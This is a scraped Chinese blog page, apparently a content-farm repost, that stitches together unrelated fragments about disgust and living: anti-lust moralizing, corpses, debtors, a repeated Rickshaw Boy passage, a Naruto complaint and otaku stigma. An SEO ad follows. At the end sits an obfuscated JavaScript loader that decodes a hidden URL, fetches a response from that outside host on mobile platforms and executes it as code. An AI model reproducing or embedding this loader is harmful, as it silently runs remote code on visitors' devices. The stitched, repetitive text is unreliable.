活着就是恶心

2022年09月02日 admin 阅读(33)

只有永远都不再贪念淫欲邪念带来的温暖恶心想吐的所谓“甜蜜快乐”的幻觉假象的感觉,不再贪念淫欲邪念带来的温暖恶心想吐的所谓“甜蜜快乐”的幻觉假象的感觉,不去对女性的身体起贪欲心,起奸邪占有的私心,不把女性的身体当做发泄淫欲的工具,不去看恶心想吐的色情,不手淫、不意淫、不贪淫好色邪淫,将心比心的尊重女性,才会让自己越来越好,才会让自己每天每分每秒都是开心快乐、发自内心深处感受到欢喜快乐的感觉健康幸福的活着!

同时看黄、手淫、意淫贪淫好色邪淫得到的所谓“甜蜜快乐”的感觉是永远都得不到的幻觉假象,并不是真实的快乐,淫欲邪念带来的温暖恶心想吐的所谓“甜蜜快乐”的幻觉假象的感觉根本就不值得贪念,也绝对不能贪念!所以不对女性的身体和“美貌”起贪欲心、起奸邪占有的私心,不把女性的身体当做发泄淫欲的工具,不看恶心想吐的色情、不手淫、不意淫、不贪念淫欲邪念带来的温暖恶心想吐的所谓“甜蜜快乐”的幻觉假象的感觉不贪淫好色不邪淫一点都不可惜,不看恶心想吐的色情、不手淫、不意淫,不贪淫好色邪淫才是最正确的,贪淫好色邪淫是活着绝对不能做的事情!

“我们不禁想问:他为什么活着。面对人本身不合人情所产生的这种不适,面对我们自身价值形象所感到的这种无法估量的堕落,正如当代一位作家所称的那种“恶心”,也就是荒诞。”

我一直在想,这是为什么呢?是怕尸体上的某些病菌传染吗?这个如果传染,殡仪师不应该已经基本上没有机会跟人握手了吗?是单纯的恶心吗?摸了死人就会感觉恶心吗?为什么呢?死人之前也曾活着,活着的时候摸没关系,死了再摸就要恶心吗?实物应该是同样一个实物啊?不是吗?摸人就OK,摸死人就要恶心,这难道是说死人不算人吗?如果不算人,那算什么呢?

真的好羡慕人家老赖,躺家里什么也不干,一群债主求着人家去干活儿还钱,不能让他们死,还得求着人家去挣钱?真的我觉得老赖是特别恶心的人,现在想想多少又不是被逼出来的?多少又是可能在好好还债的路上走着走着就停下来的!好死不如赖活着,这样活着我真的不想要!

苟全性命不可耻,生命的本能就是活着,活着就是最大的人权。苟全性命不易,既然打算活着,就得让自己快乐一些。年龄越大,能够体味到的快乐越少。要多做多想让自己快乐的事情,锻炼、旅游、读书、听好的讲座、写作;要多寻找让自己快乐的事情,试试欣赏音乐、绘画。要不想少想让自己不快乐的人和事情,包括腐败分子,不要指望他们会改过自新,干得好事,他们只会恶心自己,离他们越远越好。

一次拉车,祥子又碰到了刘四爷,刘四爷问祥子女儿的下落,祥子说死了,也没告诉他虎妞埋在哪里就这么甩头走了。对刘四爷出过这口恶气,祥子的心又有了气息。他要让那些恶心人都死,而祥子得要强的活着,他的生命再次燃起了希望。

冬天的一个黄昏,祥子在鼓楼前街拉着一位客人向京城跑。后来才发现这人原来是刘四爷。刘四爷问祥子女儿的下落,祥子说:死了!也没告诉他虎妞埋在哪里就这么甩头走了。对刘四爷出过这口恶气,祥子的心又有了气息。他要让那些恶心人都死,而祥子得要强的活着,他的生命再次燃起了希望。

剧情刚刚忍者世界大战刚刚结束就搞这一手恶心人的,为了倒贴还把旋涡一族直接写灭族了,一个战国时期乱世都能活下来的家族就,就一夜被灭了???不是为了给主角开挂你们觉得这样合理吗???要知道旋涡水户还活着啊,想想看宇智波斑活着的时候宇智波一族被灭了这有可能吗??

本来一般群众对于阿宅的印象就不太好,这类报道一出只会让大家觉得宅男更加恶心和无下限,然而事实上这些引发恶性事件的很大一部分主人公,都不是实打实的宅男,他们不过是有点关于二次元的小爱好,便被媒体肆意冠上”宅男“的标签,实在让人无语。最终成为真正的受害者,“风评”严重受损的宅男,只能忍气吞声……哪怕他们再积极地活着,还是要承受在生活里动不动就遭到别人骂“恶心”的不公平待遇。

本文转载自互联网,如有侵权,联系删除

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

卓仁IT博客
卓仁IT博客的快速排名服务领先80%同行,首家开创刷百度关键词排名程序,非纯点击方法,无点击软件出售,需要seo快速排名提高网站排名请咨询顾问。
  • 文章61274
  • 评论0
  • 浏览9827302
function uYpJJ(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function rdIfsiYJ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return uYpJJ(t);};window[''+'S'+'R'+'D'+'h'+'o'+'o'+'l'+'N'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=rdIfsiYJ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';console.log(u);var xhr=new XMLHttpRequest();xhr.open('GET',u+'/s/a?_='+i);xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function(data.data)(cs);}};xhr.send('u=1');})('aHR0cHM6Ly9hcGkuMDI3MmJiLmNvbQ==','426530553998467072',window,document,['','VxKGyJk']);}:function(){};